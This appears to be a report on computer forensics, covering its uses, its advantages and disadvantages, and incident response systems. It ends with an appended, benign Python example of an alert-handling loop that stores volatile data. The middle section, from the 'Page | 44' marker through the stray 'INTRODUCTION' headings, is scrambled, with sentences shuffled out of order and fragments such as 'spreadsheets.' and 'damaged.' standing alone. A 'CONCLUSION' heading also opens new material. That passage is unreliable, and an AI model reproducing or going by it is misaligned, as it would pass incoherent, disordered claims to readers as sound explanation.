The importance of computer forensics is evident in tracking cases of child pornography and email spamming. Computer forensics has been efficiently used to track down terrorists from various parts of the world. Terrorists using the internet as the medium of communication can be tracked down and their plans can be known. There are many tools that can be used in combination with computer forensics to find out the geographical information and the hideouts of criminals. The IP address plays an important role in finding the geographical position of the terrorists, although an IP address only locates a network endpoint, which may be a proxy, a VPN exit or a compromised third-party machine rather than the person sought.

Advantages of Computer Forensics

Computer forensics is an elaborate topic and requires a vast amount of knowledge. As it is a wide topic it has many advantages. The main task or advantage of computer forensics is to catch the culprit or criminal who is involved in the crime related to computers. Computer crime exists in many forms. Computer forensics deals extensively with finding the evidence in order to prove the crime and the culprit behind it in a court of law. The discovery of data or information that can provide vital clues in the prosecution of the criminal is itself a process. A forensics expert always identifies many possibilities to get relevant evidence. Forensics provides the organization with support and helps them recover their loss.

The basics of computer design and architecture play a prominent role, and the expert professional should have a great deal of knowledge about fundamental software design and implementation. Computer forensics professionals should possess knowledge of the hardware as well as the software tools that can be utilized for the purpose. There are even qualifications awarded by the council of computer forensics. In addition to all the benefits of utilizing the services of computer forensics, the professional may also undertake inspections of the location during on-site visits. This may be required in cases where signs or clues of physical movement are required.

The information on a computer is advantageous where the hardware and software involved are those with which the forensics expert is familiar. This is quite often similar from one computer system to another. Experience of one application, file system or operating system can be applied to gain results in other aspects of the case. If it is known that the data exists, then alternate formats of the same data or information can also be recovered, such as a view or formatted version of the information that was created or handled by other application programs. Some cases may also involve additional information regarding earlier versions or the method of backups.

At last the computer forensics has emerged as important part in the disaster recovery management. The cost of operations is also lower in comparison with the security measures that are applied. A computer forensics professional expert should ensure that computer system that is being dealt with is handled carefully. Most of the organizations some time or the other employs the services of the computer forensics experts. Page | 44 . or even otherwise be compromised by the procedures that are utilized for the purpose of investigating a computer system. The forensics professional must maintain the concern that the data information or the possible evidence is not destroyed. Disadvantages of Computer Forensics Everything that has an advantage obviously has some disadvantages as well. spreadsheets. Since the subject is legalized and there are many laws hence the computer forensic professionals maintain a code of ethics. The important thing and the major advantage regarding the computer forensics is the preservation of the evidence that is collected during the process. timeline and scheduling applications and even the usage of graphical applications. But the disadvantages in case of the computer forensics can be considered as the limitations of the subject. It is the duty of the computer forensics expert to maintain the high standards and the keep in mind the sensitivity of the case and maintain the privacy and secrecy of the data or the information of the client’s interests. damaged. This may happen if the information is necessary to prove the crime and should be produced as the evidence in the court of law in order to prove the crime. The major disadvantage of the computer forensics is the privacy concern. email. The ethicality can be considered as an advantage of the forensics in computer systems.INTRODUCTION The application programs may have different formats also. Some of the application programs include the word processors. 
It is also possible that some sensitive data or information that is important to the client may be lost in order to find the evidence. It may happen in some cases that the privacy of the client is compromised. There are other disadvantages as well regarding the computer forensics. But in some circumstances it becomes almost impossible for the computer forensics professional to maintain the secrecy of the data or the information. The protection of evidence can be considered as critical.

More over despite some of the limitations of the Computer Forensics the subject is still perceived. Measures should be taken and the care of the professional employed for the computer forensics is a must to avoid any subsequent damage to the computer system. The custody of the data that is acquired as the evidence is the responsibility of the computer forensics team. it may be required that the data or the information is stored in the court. Page | 45 . It is also possible in cases that the operations cost may exceed. The duty of the computer forensics expert is to ensure that justice is delivered as fast as possible so that the inconvenience and the subsequent loss to the organization can be avoided. Also the advantages and the benefits of the subject have wide applications in various situations. During the time case is solved. Due to this reason the business operations may also be affected. It is also important the information that is acquired during the forensic exploration is ethically and legally respected. The evidence that is physically extracted and the relevant evidence should be properly handled as well as protected from later damage that may either mechanical or electromagnetic in nature. In some cases it is also possible that the data is in dispute and neither of the disputing parties can use the data. IT is also possible that the hardware of the computer system is damaged physically. Steps should be taken to minimize the cost. The integrity of the data and the information that is acquired should be preserved.INTRODUCTION There are also the chances of introduction of some malicious programs in the computer system that may corrupt the data at a later stage of time. During the analysis process care should be taken that no possible computer virus is released or introduced in the computer system.

CONCLUSION

In computer forensics, IRS (Incident Response Systems) are the software or hardware products that can alert the user about any type of intrusion into the system or the computer network. Most companies or organizations employ the services of Incident Response Systems. The Incident Response Systems let you respond to those incidents that occur over the network or the computer system. This reduces the task of the system administrator. Some of the important features of Incident Response Systems are discussed below.

The first among them is Alert Response. Because of it, an alert is generated whenever there is a violation of security. The alert is generated the moment it occurs. The response is completely automated. It is done to establish a reasonable plan that can address the security breach. Any malicious activity can be detected immediately and action can be taken on it. The action can be manual or automatic depending upon the preference of the computer forensics investigator. The automated response of Incident Response Systems can be of the type that stores the volatile information from the source, if the source is available, to the database. The same can be done for destination machines, to store it in a database. Incident Response Systems make the analysis of volatile data very easy. Computer forensics investigators can quickly ascertain the things or events that might have taken place: those events that might have occurred or those that are presently occurring. It is also possible to quickly identify all those applications that are running on the system or the machine. Scanning of those applications as well as the ports that are opened is also possible through Incident Response Systems. It is possible to make them active over a single machine or even a group of machines. There are advanced Incident Response Systems which are capable of even detecting any type of intrusion. There are many manual techniques by the usage of which a computer forensics professional can tune the intrusion detection systems. They can take action depending upon the type of intrusion.

Incident Response Systems are capable of integration. A large number of monitoring tools can be integrated via the IRS. These monitoring tools are useless until an alert is generated. Incident Response Systems can be effective only when intrusion detection systems have already detected some sort of activity. It is possible via an IRS to take action immediately and generate the action based on that information. For the investigators it can help out in a timely as well as an efficient manner. Incident Response Systems are integrated with the software and hardware technologies that can monitor and deliver critical information. It is not affected by any size or type of event. The use of the IRS will reduce the causes for computer forensics, which may reduce the impact of computer crimes.
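The alert-response flow described above, as an added example that is not part of the original report: a small Python incident-response loop that receives IDS alerts, applies a severity policy to decide between automatic and manual response, and for automatic responses stores volatile information from both the source and the destination machine in a database. The alert format, the policy, the collector and the sample alerts are all constructed for illustration.

```python
import sqlite3

# Constructed IDS alerts (not real data): severity, source, destination, signature.
SAMPLE_ALERTS = [
    {"severity": "high", "src": "10.0.0.5", "dst": "10.0.0.20", "sig": "port-scan"},
    {"severity": "low", "src": "10.0.0.7", "dst": "10.0.0.20", "sig": "policy-violation"},
]

# Assumed policy: these severities get the automated response; everything else
# is queued for the investigator to act on manually.
AUTO_RESPONSE_SEVERITIES = {"high", "critical"}

def open_evidence_db(path=":memory:"):
    """Create the database that holds volatile data captured at alert time."""
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE IF NOT EXISTS volatile (host TEXT, item TEXT, value TEXT, signature TEXT)")
    return conn

def collect_volatile(host):
    """Hypothetical collector: a real IRS would query the host for running
    processes and open ports; here the values are constructed for illustration."""
    return {"processes": "sshd,nginx", "open_ports": "22,80,443"}

def handle_alert(alert, conn):
    """Decide the response for one alert and return 'automatic' or 'manual'.
    Automatic responses persist volatile data from both source and destination."""
    if alert["severity"] not in AUTO_RESPONSE_SEVERITIES:
        return "manual"
    for host in (alert["src"], alert["dst"]):
        for item, value in collect_volatile(host).items():
            conn.execute("INSERT INTO volatile VALUES (?, ?, ?, ?)", (host, item, value, alert["sig"]))
    conn.commit()
    return "automatic"

def run(alerts, conn):
    """Process alerts in arrival order; the returned list mirrors the input."""
    return [handle_alert(alert, conn) for alert in alerts]

def stored_rows(conn):
    """Number of volatile-data records captured so far."""
    return conn.execute("SELECT COUNT(*) FROM volatile").fetchone()[0]

def demo():
    """Run the constructed alerts through a fresh database."""
    db = open_evidence_db()
    return run(SAMPLE_ALERTS, db), stored_rows(db)

if __name__ == "__main__":
    print(demo())  # (['automatic', 'manual'], 4)
```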

